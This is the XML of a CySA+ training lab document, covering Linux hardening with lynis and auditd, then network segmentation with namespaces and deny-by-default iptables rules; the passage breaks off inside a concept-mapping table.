        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Disable unused filesystems (cramfs, freevxfs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Enable process accounting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Read the full report:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>less /var/log/lynis.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Enable auditd and watch a sensitive file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>systemctl enable --now auditd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>auditctl -w /etc/passwd -p wa -k passwd_changes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-w adds a watch, -p wa records writes and attribute changes, -k tags events with a key. Now trigger an event:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo "# test" &gt;&gt; /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ausearch -k passwd_changes -i | tail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should see who, when, and which syscall touched the file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Apply a quick hardening control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Disable an unused service and verify:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>systemctl list-unit-files --state=enabled | head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>systemctl disable --now cron 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>systemctl status cron</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In production you would also: enable a host firewall (Lab 24), set umask 027, and configure /etc/login.defs password policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Where Linux configuration, logs, and kernel tunables live.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to enumerate processes, sockets, hardware, and kernel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to run a free CIS-style audit with lynis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to write an auditd rule and read the resulting events with ausearch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to where Linux configuration, logs, and kernel tunables live.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 3 — Network Segmentation and Zero Trust</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build two isolated network "zones" using Linux network namespaces, then enforce a deny-by-default policy between them with iptables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will build two isolated network "zones" using Linux network namespaces, then enforce a deny-by-default policy between them with iptables. This is a hands-on model of the segmentation, SDN, SASE, and Zero Trust concepts in CySA+ 1.1 (Network architecture, Segmentation, Zero trust).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run all commands on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4937760" cy="2790583"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_7c675dab12.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="2790583"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Why segmentation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A flat network lets ransomware pivot from any compromised host to every other. Segmentation puts hosts in zones (DMZ, user, server, OT) and a firewall between each zone. Zero Trust goes further: every connection is authenticated and authorised even inside the perimeter — there is no "trusted internal".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Create two zones with network namespaces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip netns add zone-a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip netns add zone-b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip link add veth-a type veth peer name veth-b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip link set veth-a netns zone-a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip link set veth-b netns zone-b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip -n zone-a addr add 10.10.1.1/24 dev veth-a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip -n zone-b addr add 10.10.1.2/24 dev veth-b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip -n zone-a link set veth-a up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip -n zone-b link set veth-b up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip -n zone-a link set lo up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip -n zone-b link set lo up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Two isolated network stacks now share a wire. Test connectivity:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip netns exec zone-a ping -c2 10.10.1.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Apply a deny-by-default policy in zone-b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip netns exec zone-b iptables -P INPUT DROP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip netns exec zone-b iptables -P OUTPUT DROP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip netns exec zone-b iptables -A INPUT  -i lo -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip netns exec zone-b iptables -A OUTPUT -o lo -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Re-test from zone-a:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip netns exec zone-a ping -W2 -c2 10.10.1.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>All traffic is now blocked — this is the segmentation enforcement point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Allow only one explicit flow (Zero Trust style)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Permit only SSH (TCP/22) from zone-a, and only an established response:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip netns exec zone-b iptables -A INPUT  -p tcp --dport 22 -s 10.10.1.1 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip netns exec zone-b iptables -A OUTPUT -p tcp --sport 22 -d 10.10.1.1 -m conntrack --ctstate ESTABLISHED -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ICMP is still blocked, but a TCP probe to port 22 will reach the host:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt install -y netcat-openbsd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip netns exec zone-b nc -l -p 22 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ip netns exec zone-a nc -zv 10.10.1.2 22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You now have one explicitly allowed flow and nothing else — the essence of Zero Trust segmentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Map the model to CySA+ vocabulary</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CySA+ concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>What you built</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>On-premises</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Both namespaces on local host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
